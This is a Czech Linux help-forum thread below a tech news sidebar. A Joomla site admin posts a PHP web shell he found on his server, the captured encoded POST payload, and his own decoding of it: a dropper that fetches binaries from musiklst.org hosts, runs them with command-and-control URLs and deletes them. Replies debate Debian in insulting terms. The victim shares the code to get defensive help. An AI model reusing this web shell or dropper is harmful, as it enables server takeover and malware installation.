Armbian, tj. linuxová distribuce založená na Debianu a Ubuntu optimalizovaná pro jednodeskové počítače na platformě ARM a RISC-V, ke stažení ale také pro Intel a AMD, byl vydán ve verzi 26.2.1. Přehled novinek v Changelogu.
Volí se dvě místa v Radě openSUSE. Seznamte se se čtyřmi kandidáty. Členové projektu openSUSE mohou hlasovat od 1. do 8. března. Výsledky budou oznámeny 9. března.
Společnost OpenAI uzavřela dohodu s americkým ministerstvem obrany o poskytování technologií umělé inteligence (AI) pro utajované sítě americké armády. Firma to oznámila několik hodin poté, co prezident Donald Trump nařídil vládě, aby přestala využívat služby společnosti Anthropic.
Technologická společnost Anthropic v noci na dnešek oznámila, že se obrátí na soud kvůli rozhodnutí ministerstva obrany označit ji za bezpečnostní riziko dodavatelského řetězce poté, co nevyhověla jeho požadavkům týkajícím se používání umělé inteligence (AI). Prezident Donald Trump krátce před tím uvedl, že nařídil federálním úřadům postupně ukončit využívání jejích AI technologií. Spor mezi firmou vyvíjející chatbot Claude a
… více »Zemřel Rob Grant, spolutvůrce kultovního sci-fi seriálu Červený trpaslík.
Apple oznámil, že iPhone a iPad jako první a jediná zařízení pro koncové uživatele splňují požadavky členských států NATO na zabezpečení informací. Díky tomu je možné je používat pro práci s utajovanými informacemi až do stupně „NATO Restricted“, a to bez nutnosti instalovat speciální software nebo měnit nastavení. Žádné jiné běžně dostupné mobilní zařízení tak vysokou úroveň státní certifikace dosud nezískalo.
Americký provozovatel streamovací platformy Netflix odmítl zvýšit nabídku na převzetí filmových studií a streamovací divize konglomerátu Warner Bros. Discovery (WBD). Netflix to ve čtvrtek oznámil v tiskové zprávě. Jeho krok po několikaměsíčním boji o převzetí otevírá dveře k akvizici WBD mediální skupině Paramount Skydance, a to zhruba za 111 miliard dolarů (2,28 bilionu Kč).
Americká společnosti Apple přesune část výroby svého malého stolního počítače Mac mini z Asie do Spojených států. Výroba v závodě v Houstonu by měla začít ještě v letošním roce, uvedla firma na svém webu. Apple také plánuje rozšířit svůj závod v Houstonu o nové školicí centrum pro pokročilou výrobu. V Houstonu by měly vzniknout tisíce nových pracovních míst.
Vědci Biotechnologické společnosti Cortical Labs vytvořili biopočítač nazvaný CL1, který využívá živé lidské mozkové buňky vypěstované z kmenových buněk na čipu. Po úspěchu se hrou PONG se ho nyní snaží naučit hrát DOOM. Neurony přijímají signály podle toho, co se ve hře děje, a jejich reakce jsou převáděny na akce jako pohyb nebo střelba. V tuto chvíli systém hraje velmi špatně, ale dokáže reagovat, trochu se učit a v reálném čase se hrou
… více »Pro testování byl vydán 4. snapshot Ubuntu 26.04 LTS (Resolute Raccoon).
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
$ietdgc = "8c8580370182a2d20127a69c5c7b1af6";
if(isset($_REQUEST['eosdzj']))
{ $wmbqhi = $_REQUEST['eosdzj'];
eval($wmbqhi); exit(); }
if(isset($_REQUEST['geokxjkd']))
{ $wwdqd = $_REQUEST['ulgidjx'];
$koayobr = $_REQUEST['geokxjkd'];
$lyuot = fopen($koayobr, 'w');
$zcawdru = fwrite($lyuot, $wwdqd);
fclose($lyuot);
echo $zcawdru;
exit(); }
todle šlo POSTem po otevření infikované stránky:eosdzj=%24p+%3d+array%5fkeys%28%24%5fREQUEST%29%3b+echo+%24%5fREQUEST%5b%24p%5b2%5d%5d%3b+eval%28base64%5fdecode%28%24%5fREQUEST%5b%24p%5b1%5d%5d%29%29%3b&p1=ZnVuY3Rpb24gZG93bmxvYWRGaWxlICgkdXJsLCAkcGF0aCkgewoKICAkbmV3Zm5hbWUgPSAkcGF0aDsKICAkZmlsZSA9IGZvcGVuICgkdXJsLCAicmIiKTsKICBpZiAoJGZpbGUpIHsKICAgICRuZXdmID0gZm9wZW4gKCRuZXdmbmFtZSwgIndiKyIpOwoKICAgIGlmICgkbmV3ZikKICAgIHdoaWxlKCFmZW9mKCRmaWxlKSkgewogICAgICBmd3JpdGUoJG5ld2YsIGZyZWFkKCRmaWxlLCAxMDI0ICogNjQgKSwgMTAyNCAqIDY0ICk7CiAgICB9CiAgfQoKICBpZiAoJGZpbGUpIHsKICAgIGZjbG9zZSgkZmlsZSk7CiAgfQoKICBpZiAoJG5ld2YpIHsKICAgIGZjbG9zZSgkbmV3Zik7CiAgfQogfQoKJG9zID0gcGhwX3VuYW1lKCdzJyk7CiR0eXBlID0gcGhwX3VuYW1lKCdtJyk7CgplY2hvICJQSFBfU1RBUlQiOwoKaWYgKCAhZnVuY3Rpb25fZXhpc3RzKHNoZWxsX2V4ZWMpICkKewoJZWNobyAibm9leGVjXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgppZiAoICRvcyAhPT0gIkxpbnV4IiApCnsKCWVjaG8gIk5vTGludXg6ICIuJG9zLiI8YnI%2bXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgoKCmlmICgkdHlwZSA9PSAieDg2XzY0IikgLy82NC1iaXQgb3MKewoJcHJpbnQgIng4Nl82NFxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzNjQiOwoJJHBzID0gIi4vcHM2NCI7Cn0KZWxzZQp7CglwcmludCAiaTY4NlxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzMzIiOwoJJHBzID0gIi4vcHMzMiI7Cn0KCiRwcyA9ICJwcyI7CgppZiAoIWZpbGVfZXhpc3RzKCRwcykpCnsKCWVjaG8gIkRvd25sb2FkICRkd1xuIjsKCWRvd25sb2FkRmlsZSgkZHcsICRwcyk7CgkvL0BmaWxlX3B1dF9jb250ZW50cygiJFBTIiwgQGZpbGVfZ2V0X2NvbnRlbnRzKCRkdykpOwp9CmVsc2UKewoJZWNobyAiRXhpc3RzICRwc1xuIjsKfQoKCmNobW9kICgkcHMsICIwNzU1Iik7CgokZW52ID0gIkJEVT1odHRwOi8vYnQyMi5tdXNpa2xzdC5vcmcvYXIxLnBocCBTSFU9aHR0cDovL3Nlby5tdXNpa2xzdC5vcmcvZ3UucGhwIFNLVT1odHRwOi8vc2VlazIyLm11c2lrbHN0Lm9yZy8gTElOPTYwMDAgREJOPWFmMDAxIjsKJGNtZCA9ICRlbnYuIiAuLyRwcyA%2bL2Rldi9udWxsIDI%2bL2Rldi9udWxsICYiOwokb3V0ID0gc2hlbGxfZXhlYygkY21kKTsKCnVubGluayAoJHBzKTsKCmVjaG8gIlBIUF9FTkQiOwo%3d&p2=b1946ac92492d2347c6235b4d2611184&shid=33338
snažil jsem se to rozluštit a dostal jsem z toho skript:
$p = array_keys($_REQUEST); echo $_REQUEST[$p[2]]; eval(base64_decode($_REQUEST[$p[1]]));a proměnná $p[1] obsahuje toto:
function downloadFile ($url, $path)
{ $newfname = $path; $file = fopen ($url, "rb");
if ($file) { $newf = fopen ($newfname, "wb+");
if ($newf) while(!feof($file))
{ fwrite($newf, fread($file, 1024 * 64 ), 1024 * 64 ); }
}
if ($file) { fclose($file); }
if ($newf) { fclose($newf); } }
$os = php_uname('s');
$type = php_uname('m');
echo "PHP_START";
if ( !function_exists(shell_exec) )
{ echo "noexec\n"; echo "PHP_END"; exit(0); }
if ( $os !== "Linux" ) { echo "NoLinux: ".$os."
\n";
echo "PHP_END";
exit(0);
}
if ($type == "x86_64") //64-bit os
{
print "x86_64\n";
$dw = "http://pages.musiklst.org/ps64";
$ps = "./ps64";
}
else
{
print "i686\n";
$dw = "http://pages.musiklst.org/ps32";
$ps = "./ps32";
}
$ps = "ps";
if (!file_exists($ps))
{
echo "Download $dw\n";
downloadFile($dw, $ps);
//@file_put_contents("$PS", @file_get_contents($dw));
}
else
{
echo "Exists $ps\n";
}
chmod ($ps, "0755");
$env = "BDU=http://bt22.musiklst.org/ar1.php SHU=http://seo.musiklst.org/gu.php SKU=http://seek22.musiklst.org/ LIN=6000 DBN=af001";
$cmd = $env." ./$ps >/dev/null 2>/dev/null &";
$out = shell_exec($cmd);
unlink ($ps);
echo "PHP_END";
)
podle data te infikovane stranky jsem našel asi 20 podobných, server jsem přeinstalil, nahodil modsecurity a v logu vidím pokusy o otevření (bývalých) infikovaných php stránek.
záznam POST mám ale jen pro tuhle infikovanou php stránku (úplně první kód nahoře), a to proto, že to po vykonání POST házelo error:
Apache-Error: [file "/build/buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2/php5-5.3.3/sapi/apache2handler/sapi_apache2.c"] [line 326] [level 3] PHP Notice: Use of undefined constant shell_exec - assumed 'shell_exec' in /var/www/stranky/libraries/joomla/http/index.php(1) : eval()'d code(1) : eval()'d code on line 28
Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.
Díky
1.4.2014 00:46
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Chtel jsem poradit, jestli treba nezakazat nektere php ficury, ktere jsou takle drsne zneuzitelne.V PHP je dost slabá hranice mezi nebezpečné a užitečné, často se to i překrývá.
31.3.2014 15:53
Josef Kufner | skóre: 70
1.4.2014 00:44
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.
Předně je nezbytné změnit distribuci. Když člověk používá tu nejhorší, jaká je kde k nalezení, těžko se může divit následkům tohoto typu. Nikdo neví, kolik se v záměrně špatných distribucích skrývá problémů tohoto rozsahu.
…buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2…
Taky jsem to hledal…
Tak to je dobrá otázka. Ne, stále ještě mě neopustil ten zlozvyk říkat přesně to, co kolem sebe vidím, bez vytáček, bez politické korektnosti a bez snahy být zadobře se „všemi“ nebo s „většinou“.
Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne. Hlavně je úsměvné, jak často Debian neustojí ani jednu jedinou aktualizaci systému (což je pro normální distribuce běžný proces, který by se měl dít asi tak jednou týdně nebo častěji) a jeho uživatel pak celý stroj přeinstaluje, místo Shitty tam dá Crappy a dostane se znova do naprosto stejné situace, jen posunuté v čase. 
Kdepak zloba — zkrátka jen říkám, co vidím.
Dokladuj prípady zlyhania aktualizácie debianu.
K tomu nemám důvod ani potřebu, i když by asi stačilo prohledat pár desítek dotazů z místní poradny. Kdo chce tu sračku používat, dobře mu tak. Proč bych mu něco dokládal?
Ich habe keine Probleme mit stable debian.Du nichts mochte lernen.
I Dont have a Problem with stable debian. You dont want to learn.
Co je to stable verze? Jak může mít systém sestávající z tisíců balíčků verzi? Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.
Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví. Děkuji, nechci. Používat 5 let staré technologie s 5 let starými bugy je na mě opravdu moc složité. Já používám pouze software, který je aktuální a který zkrátka funguje.
Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.Your logic is flawed...
Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví.To je lež, lež, lež.
Kdepak zloba — zkrátka jen říkám, co vidím.Halucinogeny jsou svinstvo. Zkus to bez nich a možná to bude lepší.
Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne.
Na arch by mohol byť aj titulok : "Arch falling of the Cliff"
Předně je nezbytné změnit distribuci.Schovej si tyhle svoje bláboly někam mimo poradnu, jo? Děravou Joomlu opravdu změna distribuce nevyřeší. A co se týče odkazovaného problému - IIRC se vývojáři Debianu ptali v mailové konferenci vývojářů OpenSSL a ti tu (chybnou) změnu odsouhlasili s tím, že totéž udělají v upstreamu. Následně zjistili, že ne, ale nikomu v Debianu už to neřekli.
Vieš o tom, že archlinux v openVZ poriadne nefunguje.
Ako si predstavuješ bezpečnosť ? Vyzerá to tak, že nová verzia všetko rieši.
Mně stačí, že funguje v LXC. Navíc v ArchLinuxu v podstatě nikdy nepoužívám distribuční kernel, takže vlastně nevím, kde všude ArchLinux sám od sebe funguje a kde ne.
Na serverech často ArchLinux nemám, protože ne každý je fanouškem ArchLinuxu a u sdílených strojů je lepší mít systém, kterému s rozumnou pravděpodobností bude víc lidí rozumět. Proto zpravidla padne volba na Fedoru. U jednoho z předchozích zaměstnavatelů jsem měl dokonce desktop s Fedorou (zpočátku z povinnosti/nutnosti). Sice to nebyl můj oblíbený ArchLinux s custom kernelem a pár vychytávkami, ale co se týká spolehlivosti a rozumného implicitního nastavení, nemohl jsem si ten desktop vynachválit. Tedy nechápu ten intenzivní masochismus, který někoho přivede až k Debianu, ať už na desktopu nebo na serveru.
Problémy s bezpečností nemají jiné řešení než přechod na novou verzi. Jediná otázka je, jestli to bude nová verze přímo od tvůrců daného balíčku (což přesně v případě OpenSSL nelze než doporučit), nebo stokrát patchovaný paskvil, který se snaží opravit chybu a zároveň zůstat kompatibilní s nějakým zoufale zastaralým prostředím. Debian volí druhou možnost a jeho 32768 OpenSSL klíčů byl jeden z hvězdných výsledků tohoto přístupu k věci.
2.4.2014 10:22
Jendа | skóre: 78
| blog: Jenda
| JO70FB
mirror.vpsfree.cz:~# grep "connect from" /var/log/rsyncd ... 2012/08/08 08:32:54 [13520] connect from UNKNOWN (195.39.65.169) 2012/08/09 09:27:11 [15203] connect from UNKNOWN (195.39.65.169) 2012/08/10 12:28:49 [18338] connect from UNKNOWN (195.39.65.169) 2012/08/13 12:21:57 [30405] connect from UNKNOWN (195.39.65.169) 2012/08/14 10:13:22 [32294] connect from UNKNOWN (195.39.65.169) 2012/08/14 17:28:08 [432] connect from UNKNOWN (195.39.65.169) 2012/08/15 11:37:58 [1857] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:19:28 [15359] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:37:54 [15372] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:38:36 [15373] connect from UNKNOWN (195.39.65.169) 2013/01/14 21:56:20 [19673] connect from node1a.prg.vpsfree.cz (77.93.223.10)
1.4.2014 08:30
MMMMMMMMM | skóre: 44
| blog: unstable
| Valašsko :-)
Ad. Josef Kufner: provozuju malý web pro neziskové sdružení, moje kvality poskytnutých služeb proto určitě postačují. Obávám se,že i kdybych provozoval web u hostingu, tak když se tam dostali přes mou joomlu, dostali by se tam i přes joomlu na hostingu.
Ad. Andrej: respektuju tvůj názor na Debian, ačkoli ho teda nesdílím. A tvůj příspěvek mi příjde trochu mimo, neptal jsem se na kvalitu distribuce. Něco jako bych já šel ná fórum škodovky, kde má někdo problém s převodovkou u suprbu a radil mu, že škodovka stojí za hojno, ať si raděj koupí dáčiju
Díky těm, co se snažili poradit.
Tiskni
Sdílej:
